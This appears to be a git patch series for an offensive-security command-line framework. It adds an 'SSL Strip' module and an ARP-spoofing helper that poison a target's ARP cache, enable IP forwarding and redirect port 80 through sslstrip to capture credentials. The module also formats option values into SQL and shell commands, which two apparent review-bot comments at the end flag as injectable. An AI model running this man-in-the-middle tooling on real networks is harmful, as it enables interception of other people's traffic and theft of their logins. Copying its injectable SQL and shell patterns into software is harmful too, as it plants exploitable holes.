From 231c4114a6e3d9955932a45dc32d00d4736287f9 Mon Sep 17 00:00:00 2001
From: George Hughey
Date: Sat, 3 Dec 2016 17:05:32 +0000
Subject: [PATCH 1/3] Added dependency
---
 pip_dependencies | 1 +
 1 file changed, 1 insertion(+)
diff --git a/pip_dependencies b/pip_dependencies
index 2e5b8e6..9dbf50b 100644
--- a/pip_dependencies
+++ b/pip_dependencies
@@ -9,3 +9,4 @@ python-wifi
 psycopg2
 pycrypto
 nose
+flask_cors
From 04ea04d701eee75c970becd025689876b0cf4f38 Mon Sep 17 00:00:00 2001
From: George Hughey
Date: Sat, 3 Dec 2016 17:17:31 +0000
Subject: [PATCH 2/3] Changed tests
---
 tests.py | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)
diff --git a/tests.py b/tests.py
index 66b99cd..d715da7 100644
--- a/tests.py
+++ b/tests.py
@@ -6,7 +6,8 @@ prompt = Fore.BLUE + ">> " + Fore.RESET def base_test(): -<<<<<<< HEAD + cli = pexpect.spawn("sudo python cli.py") + cli.expect(re.escape(prompt)) pass def padding_tests():
@@ -18,9 +19,7 @@ def padding_tests(): print pad("123456789876") print pad("a") pass + + padding_tests() -======= - cli = pexpect.spawn("sudo python cli.py") - cli.expect(re.escape(prompt)) ->>>>>>> 9219848aa75d979a0ca9a6219a9a863455aa8158
From 63601968356e305ec98cb8787601feb6ccdd43ee Mon Sep 17 00:00:00 2001
From: George Hughey
Date: Sat, 3 Dec 2016 19:36:52 +0000
Subject: [PATCH 3/3] Added sslstrip
---
 capabilities/exploitation/sslstrip.py | 47 +++++++++++++++++++++++++++
 capabilities/exploitation/util_arp.py | 36 ++++++++++++++++++++
 pip_dependencies | 1 +
 3 files changed, 84 insertions(+)
 create mode 100644 capabilities/exploitation/sslstrip.py
 create mode 100644 capabilities/exploitation/util_arp.py
diff --git a/capabilities/exploitation/sslstrip.py b/capabilities/exploitation/sslstrip.py
new file mode 100644
index 0000000..f3c3614
--- /dev/null
+++ b/capabilities/exploitation/sslstrip.py
@@ -0,0 +1,47 @@
+from util_arp import *
+import os
+from capability import *
+
+class sslstrip(Capability):
+
+ def __init__(self, core):
+ super(sslstrip, self).__init__(core)
+ self.name = "SSL Strip"
+ self.options = {
+ "masq" : Option("masq", "", "ID of the computer to masquerade as", True),
+ "source": Option("source", "", "ID of the source computer", True),
+ "dest": Option("dest", "", "ID of the target", True),
+ "name": Option("name", "ssl_log", "File to log output of sslstrip", True),
+ }
+ self.help_text = INFO + "ARP Spoof, then strip SSL traffic, allowing us to see credentials."
+
+ def exec_command(self, comm):
+ self.core.cur.execute(comm)
+ return self.core.cur.fetchall()[0][0]
+
+ def getVars(self):
+ self.masq_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("masq")))
+ self.masq_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("masq")))
+ self.source_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("source")))
+ self.source_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("source")))
+ self.dest_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("dest")))
+ self.dest_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("dest")))
+
+ def arpGo(self):
+ os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
+ return arpBegin(self.masq_ip, self.masq_mac, self.source_mac, self.dest_ip, self.dest_mac)
+
+ def restore(self):
+ self.getVars()
+ self.proc.terminate()
+ arpEnd(self.masq_ip, self.masq_mac, self.dest_ip, self.dest_mac)
+ os.system("iptables -F")
+ os.system("killall sslstrip")
+
+
+ def launch(self):
+ self.getVars()
+ os.system("sslstrip -w " + str(self.get_value("name")) + " &")
+ self.proc = self.arpGo()
+ os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000")
+ return self.proc
diff --git a/capabilities/exploitation/util_arp.py b/capabilities/exploitation/util_arp.py
new file mode 100644
index 0000000..c5435a7
--- /dev/null
+++ b/capabilities/exploitation/util_arp.py
@@ -0,0 +1,36 @@
+from scapy.all import *
+import subprocess
+import os
+import multiprocessing
+#masq_ip: ip we masquerade as.
+#masc_mac: Masqueraded mac address
+#source_mac: Our mac address
+#Dest IP: target ip
+#Dest Mac: target mac address
+#ex: arpDos("10.0.0.1", "00:0c:29:5f:e7:50", "b8:27:eb:c2:1c:52", "10.0.0.57", "00:0c:29:08:45:1a")
+
+def arpSend(masq_ip, masq_mac, source_mac, dest_ip, dest_mac):
+ packet = ARP()
+ packet.op = 2
+ packet.psrc = masq_ip
+ packet.pdst = dest_ip
+ packet.hwdst = dest_mac
+ packet.hwsrc = source_mac
+ send(packet)
+ while True:
+ send(packet)
+ sniff(filter="arp and host " + masq_ip, count=1)
+
+def arpBegin(masq_ip, masq_mac, source_mac, dest_ip, dest_mac):
+ proc= multiprocessing.Process(target=arpSend, args=(masq_ip, masq_mac, source_mac, dest_ip, dest_mac))
+ proc.start()
+ return proc
+
+def arpEnd(masq_ip, masq_mac, dest_ip, dest_mac):
+ packet = ARP()
+ packet.op = 2
+ packet.psrc = masq_ip
+ packet.pdst = dest_ip
+ packet.hwdst = dest_mac
+ packet.hwsrc = masq_mac
+ send(packet)
diff --git a/pip_dependencies b/pip_dependencies
index 9dbf50b..2240022 100644
--- a/pip_dependencies
+++ b/pip_dependencies
@@ -10,3 +10,4 @@ psycopg2
 pycrypto
 nose
 flask_cors
+sslstrip
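Review bot: In capabilities/exploitation/sslstrip.py, `getVars` formats option values straight into SQL text (`"... WHERE ID = '{0}'".format(self.get_value("masq"))`) and `launch` concatenates the `name` option into an `os.system` shell line, so a quote or shell metacharacter in any option rewrites the query or the command; tests.py in this series starts the CLI with `sudo python cli.py`, so that command presumably runs as root. Bind the ID as a query parameter as in the fence below (the `%s` placeholder assumes `core.cur` is a psycopg2 cursor, which pip_dependencies suggests but this hunk does not show), and start the helper from an argument list, e.g. `self.strip_proc = subprocess.Popen(["sslstrip", "-w", str(self.get_value("name"))])`, which also lets `restore` terminate that one process instead of `killall sslstrip`. Separately, `restore` runs `iptables -F`, which with no `-t` flushes the filter table: the host's existing firewall rules are wiped while the nat PREROUTING redirect appended in `launch` stays in place, and `ip_forward` is left at 1. Remove exactly what was added with `iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000` and write back the forwarding value that was saved before it was changed. The fence also replaces the bare `fetchall()[0][0]`, which raises IndexError when an ID matches no row.

```python
    def exec_command(self, comm, params=()):
        # Values are bound by the driver, never formatted into the SQL text.
        self.core.cur.execute(comm, params)
        rows = self.core.cur.fetchall()
        if not rows:
            raise ValueError("no COMPUTERS row matched %r" % (params,))
        return rows[0][0]

    def getVars(self):
        for role in ("masq", "source", "dest"):
            comp_id = (self.get_value(role),)
            setattr(self, role + "_ip",
                    self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = %s", comp_id))
            setattr(self, role + "_mac",
                    self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = %s", comp_id))

    # ... unchanged: arpGo, restore, launch ...
```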
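Review bot: In capabilities/exploitation/util_arp.py, `arpSend` loops with no exit condition and `arpBegin` starts it as a non-daemon process, so if the CLI is killed or exits before `sslstrip.restore` runs, the sender either blocks interpreter shutdown or keeps running, and the corrective reply in `arpEnd` is never sent. Set `proc.daemon = True` before `proc.start()` so the sender ends with its parent, and have the caller reach `arpEnd` from a `finally:` path. `arpSend` never reads its `masq_mac` parameter, and the header comment misnames it `masc_mac` and cites `arpDos`, a function this file does not define; a docstring on each function stating which address goes into `psrc`, `hwsrc`, `pdst` and `hwdst` would replace that block. `from scapy.all import *`, combined with `from util_arp import *` in sslstrip.py, re-exports every scapy name along with the unused `subprocess` and `os` imports; importing `ARP`, `send` and `sniff` explicitly keeps the namespace auditable.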